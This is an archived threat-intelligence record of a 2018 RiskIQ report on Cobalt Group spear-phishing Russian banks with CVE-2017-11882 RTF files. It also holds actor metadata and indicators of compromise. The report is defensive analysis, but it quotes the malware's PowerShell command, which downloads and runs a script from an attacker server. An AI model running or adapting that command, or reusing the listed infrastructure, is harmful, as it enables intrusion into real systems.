{
	"id": "4a276ce8-e14a-4904-b892-d45fe44fa882",
	"created_at": "2026-04-06T00:12:07.272774Z",
	"updated_at": "2026-04-10T13:11:25.806649Z",
	"deleted_at": null,
	"sha1_hash": "728a27b51df771e92487111fabaa97aab6386d82",
	"title": "First Activities of Cobalt Group in 2018: Spear-phishing Russian Banks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 899125,
	"plain_text": "First Activities of Cobalt Group in 2018: Spear-phishing Russian\r\nBanks\r\nBy January 16, 2018 Yonathan Klijnsma\r\nPublished: 2018-01-16 · Archived: 2026-04-05 19:01:17 UTC\r\nLast year November, we documented activities of the Cobalt Group using CVE-2017-11882. In December they\r\nwere already setting up for their next campaign. Today, on January 16th, the first wave of spear phishing emails\r\nwere delivered to the inboxes of Russian banks. Sadly, this time around, the group didn’t forget to BCC.\r\nThe emails were sent in the name of a large European bank in an attempt to social engineer the receiver into\r\ntrusting the email. The emails were quite plain with only a single question in the body and an attachment with the\r\nname once.rtf. In other cases, we saw a file with the name Заявление.rtf attached to an email that was also written\r\nin Russian:\r\nhttps://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/\r\nPage 1 of 4\n\nFig-1 Example of spear phishing email\r\nThe emails were sent from addresses on the domains bankosantantder.com and billing-cbr.ru, which were both set\r\nup for this campaign specifically.\r\nAnalysis\r\nThe attachment abuses CVE-2017-11882 to start PowerShell with the following command:\r\npowershell -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://46.21.147.61:80/a’))”\r\nThis command downloads and executes a second stage, which is also a PowerShell script, but encoded:\r\nFig-2 Second stage\r\nThis script decodes to the third stage of the attack, another PowerShell script. This stage-three script is used to\r\nload a small piece of embedded shellcode into memory and run it like so:\r\nhttps://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/\r\nPage 2 of 4\n\nFig-3 Stage-three script\r\nThe shellcode starts the Cobalt Strike stager in a new threat and starts it up. This stager will initiate connectivity\r\nwith the C2 server to install the Cobalt Strike implant.\r\nInfrastructure\r\nAs shown, the stager beacons out to helpdesk-oracle.com, which was registered by a person using the email\r\naddress krystianwalczak@yandex.com. This email address pointed us to another domain, which was registered on\r\nthe same date and follows a similar pattern:\r\nFig-4 WHOIS information for the malicious email addresses\r\nRight now, the server to which the domain help-desc-me.com points doesn’t seem to be active, nor have we seen\r\nany malicious samples connect to it. We have marked it as malicious and listed it in the IOCs below, as we believe\r\nit will be part of either a next stage of the attack shown above or used in the next wave of spear phishing emails.\r\nIndicators of Compromise (IOC)\r\nAll of the IOCs listed below are also available in the RiskIQ Community Public Project located here:\r\nhttps://community.riskiq.com/projects/f0cd2fc9-a361-2a4c-4489-a21ddf98349b\r\nWe have not added the hashes of the staging scripts because they do not appear on the system itself—they live in\r\nmemory during the initial stages of the attack.\r\nFilesystem IOCs\r\nhttps://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/\r\nPage 3 of 4\n\nFilename(s) Note MD5\r\n \r\nOnce.rtf, Заявление.rtf\r\nCVE-2017-11882 RTF 2e0cc6890fbf7a469d6c0ae70b5859e7\r\nNetwork IOCs\r\nDomain IP Address Note\r\nbankosantantder.com 46.102.152.157 Sender domain\r\nbilling-cbr.ru 85.204.74.117 Sender domain\r\nhelpdesk-oracle.com 46.21.147.61 C2 server\r\nhelp-desc-me.com 139.60.163.10 Secondary C2\r\nSource: https://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/\r\nhttps://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/"
	],
	"report_names": [
		"cobalt-group-spear-phishing-russian-banks"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2dfaa730-7079-494c-b2f0-3ff8f3598a51",
			"created_at": "2022-10-25T16:07:23.474746Z",
			"updated_at": "2026-04-10T02:00:04.623746Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"ATK 67",
				"Cobalt Gang",
				"Cobalt Spider",
				"G0080",
				"Gold Kingswood",
				"Mule Libra",
				"TAG-CR3"
			],
			"source_name": "ETDA:Cobalt Group",
			"tools": [
				"ATMRipper",
				"ATMSpitter",
				"Agentemis",
				"AmmyyRAT",
				"AtNow",
				"COOLPANTS",
				"CobInt",
				"Cobalt Strike",
				"CobaltStrike",
				"Cyst Downloader",
				"Fareit",
				"FlawedAmmyy",
				"Formbook",
				"Little Pig",
				"Metasploit Stager",
				"Mimikatz",
				"More_eggs",
				"NSIS",
				"Nullsoft Scriptable Install System",
				"Pony Loader",
				"Ripper ATM",
				"SDelete",
				"Siplog",
				"SoftPerfect Network Scanner",
				"SpicyOmelette",
				"Taurus Builder",
				"Taurus Builder Kit",
				"Taurus Loader",
				"Terra Loader",
				"ThreatKit",
				"VenomKit",
				"cobeacon",
				"win.xloader"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c11abba0-f5e8-4017-a4ee-acb1a7c8c242",
			"created_at": "2022-10-25T15:50:23.744036Z",
			"updated_at": "2026-04-10T02:00:05.294413Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"Cobalt Group",
				"GOLD KINGSWOOD",
				"Cobalt Gang",
				"Cobalt Spider"
			],
			"source_name": "MITRE:Cobalt Group",
			"tools": [
				"Mimikatz",
				"More_eggs",
				"SpicyOmelette",
				"SDelete",
				"Cobalt Strike",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434327,
	"ts_updated_at": 1775826685,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/728a27b51df771e92487111fabaa97aab6386d82.pdf",
		"text": "https://archive.orkl.eu/728a27b51df771e92487111fabaa97aab6386d82.txt",
		"img": "https://archive.orkl.eu/728a27b51df771e92487111fabaa97aab6386d82.jpg"
	}
}